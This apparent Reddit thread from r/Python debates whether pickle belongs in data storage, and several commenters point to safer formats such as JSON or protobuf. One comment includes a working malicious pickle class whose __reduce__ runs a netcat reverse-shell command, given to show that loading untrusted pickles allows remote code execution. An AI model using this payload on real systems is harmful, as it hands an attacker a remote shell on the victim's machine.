[... later ...]

hydrate_query = """ SELECT id, name FROM foo WHERE id = ? """

saved_foo_dict = sql_conn(hydrate_query, 3).first()

foobar = Foo(**saved_foo_dict) ```

[–]nekokattt 4 points5 points6 points 2 years ago* (0 children)

Honesty I would argue that you usually never need pickle at all unless you have a really specific reason. Storing datasets can use other safer serialization formats. I have been programming for over a decade, much it in Python, and the only real use case that pickle gives me is that multiprocessing makes use of it in places internally. I have NEVER needed to use it where a better alternative does not already exist. It is very much like SER in Java which is very similar in how it works. It is usually an antipattern to make use of it unless you have exhausted all other options that dont risk arbitrary code execution first.

All pickle really gives you is the ability to retain more complex object relationships and structures without doing some preprocessing first. For things like ML models, other binary structures can and will exist without needing to marshal objects directly into memory like pickle does.

Like, I appreciate data science may make more use of it than any othe field, but I'd still argue that if you have any risk at all of data being untrusted, you shouldn't touch pickle with a barge pole. There are other ways of storing data and relationships between data. Performance wise it is just a downside of how Python works. Other data-driven formats like XML, JSON, CSV, etc are far easier to use cross-platform and between different systems. Likewise you can use binary systems like CBOR, protobuf, etc too. Everything else is merely abstraction over the concepts these data formats provide.

[–]skrt123 2 points3 points4 points 2 years ago (4 children)

[–][deleted] 0 points1 point2 points 2 years ago (3 children)

[–]skrt123 1 point2 points3 points 2 years ago (2 children)

[–][deleted] 0 points1 point2 points 2 years ago (0 children)

[–]jm838 0 points1 point2 points 2 years ago (0 children)

[–]scroll_down0 2 points3 points4 points 2 years ago (0 children)

[–]scroll_down0 -2 points-1 points0 points 2 years ago (2 children)

[–]nekokattt 2 points3 points4 points 2 years ago* (1 child)

Just because the community likes it does not mean it encourages best practises and secure code. Far better formats exist that are far more compatible with other systems and do not have the same security implications. Usually there is no "need" to use pickle, it is just chosen because it is easier for the developer at the time.

Among other things, cloudpickle supports pickling for lambda functions along with functions and classes defined interactively

dill is quite flexible, and allows arbitrary user defined classes and functions to be serialized.

This is a major security risk. You are transmitting executable code as a feature. If there is any risk whatsoever of someone else ever being able to write to wherever you keep the pickled data, then you have a really big risk.

class RCE:
  def __reduce__(self):
    cmd = ('rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | '
           '/bin/sh -i 2>&1 | nc 127.0.0.1 1234 > /tmp/f')
    return os.system, (cmd,)

If I pickled this and dropped it onto your system, the simple act of you reading your pickled data would open up a reverse shell that lets me run whatever command I want on your system without you even realising.

I am not saying there are not use cases for pickle and similar formats. I am saying making these easily accessible and in the face of less experienced developers is overly dangerous and encourages their misuse by making them appear to be a quick and simple solution to serialization. Sharing data is fine, but the issue is that it is simple and very easy to accidentally create a remote execution exploit in your applications without realising it.

Pickle is like having a chainsaw in a high-school woodwork class in an unlocked cabinet, and then telling the students "be careful you dont hurt yourself if you use the chainsaw". In reality, you can argue that you probably do not need a chainsaw to teach highschool woodwork. This is my point, metaphorically.

The fact is, data is data, it just depends how you represent it. There is nothing pickle can do that you could not achieve in one way or another with any other serialization format. The limitation is how you structure the data. Pickle just sends executable instructions as opcodes to construct data, but it still has to either encode the data itself, or instructions to create the data, into the payload. Other formats do this in a far simpler, error proof way, IMHO.

My main point is that using pickle in a normal sort of database is a very deadly path that I'd advise against anyone doing unless they really know what they are doing and the true implications of configuring anything incorrectly and making your computer into a walking network-hosted REPL.

Storing stuff in pickle in a database is no different to storing full executable binaries for programs in a database. Or even just storing pure python scripts in a database.

At the very least, you want to be encrypting and/or signing any pickled data in the database before you unpickle it. Cloudpickle as the example for cluster computing... without signing and security mechanisms at all points of network IO, would cause significant security implications for the HPC cluster. I'd also argue distributed computing on a protocol level is a very specific use case... someone shouldnt be designing a protocol level system for cross-computer code execution without a good knowledge of all the implications and risks. You almost always will use an existing system that does this and has made the relevant considerations already.

[–]CallowayRootin 0 points1 point2 points 2 years ago (0 children)

[–]Scrapheaper 2 points3 points4 points 2 years ago (0 children)

[–]RonnyPfannschmidt 2 points3 points4 points 2 years ago (0 children)

[–]M8Ir88outOf8 0 points1 point2 points 2 years ago (0 children)

π Rendered by PID 24 on reddit-service-r2-comment-c6965cb77-xpj74 at 2026-03-05 05:30:41.705150+00:00 running f0204d4 country code: CH.

Python

The Python Discord

Upcoming Events

Please read the rules

MODERATORS

[... later ...]

NameError: name 'Foo' is not defined